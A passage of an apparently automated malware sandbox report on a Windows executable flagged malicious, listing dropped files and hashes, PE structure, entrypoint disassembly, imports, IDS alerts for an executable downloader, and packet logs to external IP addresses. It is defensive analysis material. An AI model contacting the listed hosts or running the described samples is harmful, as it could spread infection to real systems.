                                                          SSDEEP:24576:ZN+7D0AOrgvNFPFqLrEu/1F8IRyIY5kkPK3MWD8wbAlxUu4BLLir1vNtkrvCOx9R:ZN+7D0AOrgvN9FerEu/3tRyIYekPK3MS
                                                          MD5:606F1EF4B610D9D6869EE7158CCA9D7A
                                                          SHA1:D834BB4291FD3ACB22D0466C8701DE9259DE2157
                                                          SHA-256:3E527E17DC87EEAA61804F9C23FD0E11FA545C684E88366EAEB4F228C1EFC49B
                                                          SHA-512:B272763525B3E5F935AD376570033752777787C718DE6683688FDAAA195EE6515B786C37962011D0558EEAFDA028444BD48A508395505B3FAFD9C26D5D12C6B2
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Joe Sandbox View:
                                                          • Filename: 8GJ842Gu9e.exe, Detection: malicious, Browse
                                                          • Filename: rs6c8bBX5r.exe, Detection: malicious, Browse
                                                          • Filename: rs6c8bBX5r.exe, Detection: malicious, Browse
                                                          • Filename: Nodf3hIUrK.exe, Detection: malicious, Browse
                                                          • Filename: uue9O7WXRA.exe, Detection: malicious, Browse
                                                          • Filename: y2b1PHwo8d.exe, Detection: malicious, Browse
                                                          • Filename: SWjcpYfYPy.exe, Detection: malicious, Browse
                                                          • Filename: WwqOJ8GXw7.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          Reputation:low
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...[$2!.........."..........L.......W.........@..........................................`.........................................H...D....................................p..X....................................................................................text............................... ..`.rdata...@.......<..................@..@.data....0...0......................@....CRT.........`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\tcgcuca

                                                          Download File
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):242688
                                                          Entropy (8bit):6.172738767574726
                                                          Encrypted:false
                                                          SSDEEP:3072:HYK1fQ0Lk53YKJCegjO/6EdjbTdDCNJ9b0BjxirY4Z4g2tnn:HYK1UmUCegjO/RXBGnb0xAr6n
                                                          MD5:B31900FFD17C8B2ECFAA9B7B6F4CDCA3
                                                          SHA1:C53316DAD42A3ACEB3154353791D0F0AE1FD819E
                                                          SHA-256:3CC5509318B88990FF3C137B65E94CFE0CC6759A16180C849584B0345B345EF1
                                                          SHA-512:6026EA3E33779B87FFAD20D7CDE3F81B7EA58A5C68FC163A61EC2B0218F3E5BE9756B2A81745CD3BAFDDE1033A84BC70F00DB9B8CFAB670BC500B53F2C6CDD78
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 34%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+...x...x...x..Vx...x..cx...x..bx..x..[x...x...x..x..gx...x..Rx...x..Ux...xRich...x................PE..L......d.................:...^......xI.......P....@..........................@.................................................<.......`G.............................................................@............P...............................text.../9.......:.................. ..`.rdata..&N...P...P...>..............@..@.data...D...........................@....wiwo................J..............@..@.jofovubF............N..............@..@.lawozuz.............h..............@..@.rsrc...`G.......H...l..............@..@................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\tcgcuca:Zone.Identifier

                                                          Download File
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.172738767574726
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:cOm0MmeV34.exe
                                                          File size:242'688 bytes
                                                          MD5:b31900ffd17c8b2ecfaa9b7b6f4cdca3
                                                          SHA1:c53316dad42a3aceb3154353791d0f0ae1fd819e
                                                          SHA256:3cc5509318b88990ff3c137b65e94cfe0cc6759a16180c849584b0345b345ef1
                                                          SHA512:6026ea3e33779b87ffad20d7cde3f81b7ea58a5c68fc163a61ec2b0218f3e5be9756b2a81745cd3bafdde1033a84bc70f00db9b8cfab670bc500b53f2c6cdd78
                                                          SSDEEP:3072:HYK1fQ0Lk53YKJCegjO/6EdjbTdDCNJ9b0BjxirY4Z4g2tnn:HYK1UmUCegjO/RXBGnb0xAr6n
                                                          TLSH:0734BF2139E5C037F2A346344AF2E6B55A3BBCA24A72A58F2FD5173E5E311D1C61831B
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x..Vx...x..cx...x..bx...x..[x...x...x...x..gx...x..Rx...x..Ux...xRich...x................PE..L......d...........

                                                          File Icon

                                                          Icon Hash:63796de971436e0f

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x404978
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6497AEAB [Sun Jun 25 03:04:11 2023 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:9fa45476e477c6919d1122378d8053e3

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F9A88D8DE27h
                                                          jmp 00007F9A88D89F7Eh
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          mov eax, dword ptr [ebp+08h]
                                                          xor ecx, ecx
                                                          cmp eax, dword ptr [0042A1E0h+ecx*8]
                                                          je 00007F9A88D8A105h
                                                          inc ecx
                                                          cmp ecx, 2Dh
                                                          jc 00007F9A88D8A0E3h
                                                          lea ecx, dword ptr [eax-13h]
                                                          cmp ecx, 11h
                                                          jnbe 00007F9A88D8A100h
                                                          push 0000000Dh
                                                          pop eax
                                                          pop ebp
                                                          ret
                                                          mov eax, dword ptr [0042A1E4h+ecx*8]
                                                          pop ebp
                                                          ret
                                                          add eax, FFFFFF44h
                                                          push 0000000Eh
                                                          pop ecx
                                                          cmp ecx, eax
                                                          sbb eax, eax
                                                          and eax, ecx
                                                          add eax, 08h
                                                          pop ebp
                                                          ret
                                                          call 00007F9A88D8D8A9h
                                                          test eax, eax
                                                          jne 00007F9A88D8A0F8h
                                                          mov eax, 0042A348h
                                                          ret
                                                          add eax, 08h
                                                          ret
                                                          call 00007F9A88D8D896h
                                                          test eax, eax
                                                          jne 00007F9A88D8A0F8h
                                                          mov eax, 0042A34Ch
                                                          ret
                                                          add eax, 0Ch
                                                          ret
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          call 00007F9A88D8A0D7h
                                                          mov ecx, dword ptr [ebp+08h]
                                                          push ecx
                                                          mov dword ptr [eax], ecx
                                                          call 00007F9A88D8A077h
                                                          pop ecx
                                                          mov esi, eax
                                                          call 00007F9A88D8A0B1h
                                                          mov dword ptr [eax], esi
                                                          pop esi
                                                          pop ebp
                                                          ret
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 4Ch
                                                          mov eax, dword ptr [0042A354h]
                                                          xor eax, ebp
                                                          mov dword ptr [ebp-04h], eax
                                                          push ebx
                                                          xor ebx, ebx
                                                          push esi
                                                          mov esi, dword ptr [ebp+08h]
                                                          push edi
                                                          mov dword ptr [ebp-2Ch], ebx
                                                          mov dword ptr [ebp-1Ch], ebx
                                                          mov dword ptr [ebp-20h], ebx
                                                          mov dword ptr [ebp-28h], ebx
                                                          mov dword ptr [ebp-24h], ebx
                                                          mov dword ptr [ebp-4Ch], esi
                                                          mov dword ptr [ebp-48h], ebx
                                                          cmp dword ptr [esi+14h], ebx

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ASM] VS2010 build 30319
                                                          • [C++] VS2010 build 30319
                                                          • [ C ] VS2010 build 30319
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [RES] VS2010 build 30319
                                                          • [LNK] VS2010 build 30319

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x294980x3c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c7f0000x4760.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x294d40x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x280980x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x250000x1a8.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x2392f0x23a00b1eccfb1ae76b971555c2dddc8488666False0.8206620065789474data7.660038630292238IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x250000x4e260x5000df97ebcdd3dc10832a7f7b6be94609f6False0.352587890625data4.913532700307973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x2a0000x1c508440xbc0030dcf63f3f45d55f41d316200adb1ee9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .wiwo0x1c7b0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .jofovub0x1c7c0000x18460x1a003c63825015aabd810674f44afac6d12bFalse0.004356971153846154data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .lawozuz0x1c7e0000x2d30x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rsrc0x1c7f0000x47600x480090bf3169c562549a8ecdd906273154c2False0.4405381944444444data4.076784335176359IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x1c7f2700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TeluguIndia0.532258064516129
                                                          RT_ICON0x1c7f9380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TeluguIndia0.41151452282157674
                                                          RT_ICON0x1c81ee00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TeluguIndia0.44680851063829785
                                                          RT_STRING0x1c825f00x4dedataTeluguIndia0.45425361155698235
                                                          RT_STRING0x1c82ad00x206dataTeluguIndia0.5038610038610039
                                                          RT_STRING0x1c82cd80x856dataTeluguIndia0.4119025304592315
                                                          RT_STRING0x1c835300x22adataTeluguIndia0.5018050541516246
                                                          RT_ACCELERATOR0x1c823780x48dataTeluguIndia0.8333333333333334
                                                          RT_GROUP_ICON0x1c823480x30dataTeluguIndia0.9375
                                                          RT_VERSION0x1c823c00x22cdata0.5341726618705036

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllSetEndOfFile, LocalCompact, CreateHardLinkA, GetModuleHandleW, GetProcessHeap, EnumResourceTypesA, GlobalAlloc, GetSystemDirectoryW, LoadLibraryW, IsProcessInJob, AssignProcessToJobObject, IsBadWritePtr, GetLastError, SetLastError, GetProcAddress, IsBadHugeWritePtr, VerLanguageNameA, FindClose, LoadLibraryA, SetConsoleCtrlHandler, AddAtomW, CreateEventW, GlobalHandle, GetModuleFileNameA, GetOEMCP, GlobalUnWire, HeapSetInformation, EnumResourceNamesA, GetCurrentThreadId, Module32NextW, GetDiskFreeSpaceExA, ReadConsoleInputW, WriteConsoleW, CloseHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, SetStdHandle, SetFilePointer, HeapReAlloc, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, MultiByteToWideChar, GetStringTypeW, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, GetCommandLineW, GetStartupInfoW, GetCPInfo, RaiseException, RtlUnwind, HeapAlloc, LCMapStringW, IsProcessorFeaturePresent, HeapCreate, ReadFile, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetLocaleInfoW, HeapSize, GetACP, IsValidCodePage, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, CreateFileW
                                                          USER32.dllChangeMenuW, GetMessageExtraInfo, CharUpperBuffA, SetCursorPos, SetUserObjectSecurity, SetCaretPos, GetCaretBlinkTime, SetClipboardViewer

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          TeluguIndia

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          07/19/24-13:44:06.953923TCP2019714ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile5778980192.168.2.564.190.113.113

                                                          Suricata IDS Alerts

                                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                          2024-07-19T13:44:07.550988+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile5778980192.168.2.564.190.113.113

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 19, 2024 13:43:28.986542940 CEST4971080192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:28.991501093 CEST8049710186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:28.991614103 CEST4971080192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:28.991746902 CEST4971080192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:28.991786003 CEST4971080192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:28.996790886 CEST8049710186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:28.997181892 CEST8049710186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:30.046596050 CEST8049710186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:30.047224998 CEST8049710186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:30.047435045 CEST4971080192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:30.048150063 CEST4971080192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:30.051475048 CEST4971180192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:30.053122044 CEST8049710186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:30.056591034 CEST8049711186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:30.058049917 CEST4971180192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:30.060446978 CEST4971180192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:30.060514927 CEST4971180192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:30.065315008 CEST8049711186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:30.065534115 CEST8049711186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:31.124438047 CEST8049711186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:31.124629021 CEST8049711186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:31.124715090 CEST4971180192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:31.124840021 CEST4971180192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:31.128825903 CEST4971280192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:31.130958080 CEST8049711186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:31.135683060 CEST8049712186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:31.135786057 CEST4971280192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:31.135934114 CEST4971280192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:31.135957956 CEST4971280192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:31.142024994 CEST8049712186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:31.142055988 CEST8049712186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:32.195909023 CEST8049712186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:32.195974112 CEST8049712186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:32.196244955 CEST4971280192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:32.196398973 CEST4971280192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:32.201862097 CEST8049712186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:32.209353924 CEST4971380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:32.214551926 CEST8049713186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:32.216873884 CEST4971380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:32.217031956 CEST4971380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:32.217057943 CEST4971380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:32.222042084 CEST8049713186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:32.222224951 CEST8049713186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:33.257466078 CEST8049713186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:33.257565022 CEST8049713186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:33.257699966 CEST4971380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:33.258037090 CEST4971380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:33.262361050 CEST4971480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:33.262871027 CEST8049713186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:33.267417908 CEST8049714186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:33.267628908 CEST4971480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:33.267873049 CEST4971480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:33.267941952 CEST4971480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:33.273269892 CEST8049714186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:33.273376942 CEST8049714186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:34.341280937 CEST8049714186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:34.341341019 CEST8049714186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:34.341401100 CEST4971480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:34.341484070 CEST8049714186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:34.341533899 CEST4971480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:34.341624022 CEST4971480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:34.345453024 CEST4971580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:34.346777916 CEST8049714186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:34.350383997 CEST8049715186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:34.350532055 CEST4971580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:34.350730896 CEST4971580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:34.350815058 CEST4971580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:34.355556011 CEST8049715186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:34.355715036 CEST8049715186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:35.411072969 CEST8049715186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:35.412306070 CEST8049715186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:35.412395000 CEST4971580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:35.412442923 CEST4971580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:35.415901899 CEST4971680192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:35.421298027 CEST8049715186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:35.421416044 CEST8049716186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:35.421577930 CEST4971680192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:35.421758890 CEST4971680192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:35.421785116 CEST4971680192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:35.430582047 CEST8049716186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:35.431775093 CEST8049716186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:36.485419989 CEST8049716186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:36.485483885 CEST8049716186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:36.485639095 CEST4971680192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:36.485780954 CEST4971680192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:36.489154100 CEST4971780192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:36.491283894 CEST8049716186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:36.494586945 CEST8049717186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:36.494874001 CEST4971780192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:36.495165110 CEST4971780192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:36.495165110 CEST4971780192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:36.500585079 CEST8049717186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:36.500629902 CEST8049717186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:37.540466070 CEST8049717186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:37.541316032 CEST8049717186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:37.541399002 CEST4971780192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:37.842746019 CEST4971780192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:37.849760056 CEST8049717186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:37.866825104 CEST4971880192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:37.871982098 CEST8049718186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:37.872123957 CEST4971880192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:37.872246027 CEST4971880192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:37.872246027 CEST4971880192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:37.877136946 CEST8049718186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:37.877283096 CEST8049718186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:38.940354109 CEST8049718186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:38.940530062 CEST8049718186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:38.940629005 CEST4971880192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:38.940675020 CEST4971880192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:43:38.942910910 CEST4971980192.168.2.577.221.157.163
                                                          Jul 19, 2024 13:43:38.945771933 CEST8049718186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:43:38.947976112 CEST804971977.221.157.163192.168.2.5
                                                          Jul 19, 2024 13:43:38.948055029 CEST4971980192.168.2.577.221.157.163
                                                          Jul 19, 2024 13:43:38.948146105 CEST4971980192.168.2.577.221.157.163
                                                          Jul 19, 2024 13:43:38.953051090 CEST804971977.221.157.163192.168.2.5
                                                          Jul 19, 2024 13:44:00.318006039 CEST804971977.221.157.163192.168.2.5
                                                          Jul 19, 2024 13:44:00.318371058 CEST4971980192.168.2.577.221.157.163
                                                          Jul 19, 2024 13:44:00.319032907 CEST4971980192.168.2.577.221.157.163
                                                          Jul 19, 2024 13:44:00.323473930 CEST5778380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:00.323915005 CEST804971977.221.157.163192.168.2.5
                                                          Jul 19, 2024 13:44:00.330450058 CEST8057783186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:00.330538034 CEST5778380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:00.330643892 CEST5778380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:00.330682993 CEST5778380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:00.335547924 CEST8057783186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:00.336085081 CEST8057783186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:01.395323038 CEST8057783186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:01.395989895 CEST8057783186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:01.399915934 CEST5778380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:01.400007963 CEST5778380192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:01.402364969 CEST5778480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:01.404876947 CEST8057783186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:01.407877922 CEST8057784186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:01.411645889 CEST5778480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:01.411735058 CEST5778480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:01.411772966 CEST5778480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:01.417056084 CEST8057784186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:01.417690992 CEST8057784186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:02.645494938 CEST8057784186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:02.645936966 CEST8057784186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:02.646006107 CEST5778480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:02.646316051 CEST5778480192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:02.648370981 CEST5778580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:02.651278019 CEST8057784186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:02.653364897 CEST8057785186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:02.653455019 CEST5778580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:02.653528929 CEST5778580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:02.653541088 CEST5778580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:02.659125090 CEST8057785186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:02.659156084 CEST8057785186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:03.775811911 CEST8057785186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:03.775868893 CEST8057785186.145.236.93192.168.2.5
                                                          Jul 19, 2024 13:44:03.775928974 CEST5778580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:03.776164055 CEST5778580192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:03.778842926 CEST5778680192.168.2.5186.145.236.93
                                                          Jul 19, 2024 13:44:03.781002045 CEST8057785186.145.236.93192.168.2.5
